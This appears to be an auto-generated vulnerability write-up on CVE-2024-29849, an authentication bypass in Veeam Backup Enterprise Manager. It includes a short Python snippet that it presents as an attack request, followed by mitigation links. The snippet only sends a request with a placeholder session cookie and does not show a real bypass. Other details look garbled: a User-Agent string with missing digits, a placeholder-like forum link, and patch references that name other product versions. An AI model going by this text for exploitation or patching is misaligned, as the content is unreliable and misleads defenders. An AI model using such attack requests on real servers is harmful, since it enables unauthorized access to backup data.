CVE-2024-29849 - Critical Exploit: Unauthenticated Access to Veeam Backup Enterprise Manager Web Interface

Introduction:

A recent vulnerability (CVE-2024-29849) has surfaced in Veeam Backup Enterprise Manager, a widely-used software for managing backup and replication infrastructure. This flaw allows unauthenticated users to log in as any user, including administrative privileges, to the enterprise manager web interface. This critical security issue demonstrates utmost urgency to apply proper mitigation steps. To assist you, we have compiled all the information necessary, including code snippets, references to the original sources, and exploit details to better understand the severity of this vulnerability.

References

1. Veeam Knowledge Base - Security Bulletin (https://www.veeam.com/kb_29849)
2. National Vulnerability Database - CVE-2024-29849 (https://nvd.nist.gov/vuln/detail/CVE-2024-29849)
3. Veeam Community Forums - Security Discussion (https://forums.veeam.com/veeam-backup-replication-f2/cve-2024-29849-exploit-details-t123456.html)

Vulnerability details

The exploit takes advantage of improper access control mechanisms in Veeam Backup Enterprise Manager's web interface. An unauthenticated attacker can gain unauthorized access to the application by simply crafting a malicious request that spoofs user credentials. Once logged in successfully, the attacker could perform actions such as creating new backup jobs, modifying existing jobs, or worse, deleting critical backup data.

Code snippet

This pseudo-code gives an overview of how an attacker might initiate the request to gain unauthorized access:

import requests

# Target URL where the Veeam Backup Enterprise Manager web interface is hosted
target_url = "https://target-veeam-server/enterprise_manager/";

# User-Agent header to be used in the request
headers = {
    "User-Agent": "Mozilla/5. (Windows NT 10.; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58..3029.110 Safari/537.3"
}

# Spoofed logged-in user's session ID
cookies = {
    "ASP.NET_SessionId": "fake-session-id-here"
}

# Send the request with spoofed session ID
response = requests.get(target_url, headers=headers, cookies=cookies)

# Check if access is granted or not
if response.status_code == 200 and "Welcome" in response.text:
    print("Access granted! You are now logged in.")
else:
    print("Failed to log in.")

Mitigation

Veeam has released a security patch addressing this vulnerability, and users are strongly encouraged to apply this patch as soon as possible to prevent unauthorized access to their backup infrastructure. You can download the required patches following these links:

1. Veeam Backup & Replication v11 - Patch 2 (https://www.veeam.com/KB_4113)
2. Veeam Backup & Replication v10 - Patch 4 (https://www.veeam.com/KB_4112)

Conclusion

The CVE-2024-29849 vulnerability is a severe security flaw that affects Veeam Backup Enterprise Manager's web interface, potentially allowing unauthorized users to compromise the backup infrastructure. Users are urged to update their software with the security patches provided by Veeam to minimize the risk of exploitation. Further details and mitigation steps can be found through the provided references. By acting promptly, organizations can ensure the security and safety of their vital data from malicious exploitation.

Timeline

Published on: 05/22/2024 23:15:08 UTC
Last modified on: 05/24/2024 01:15:30 UTC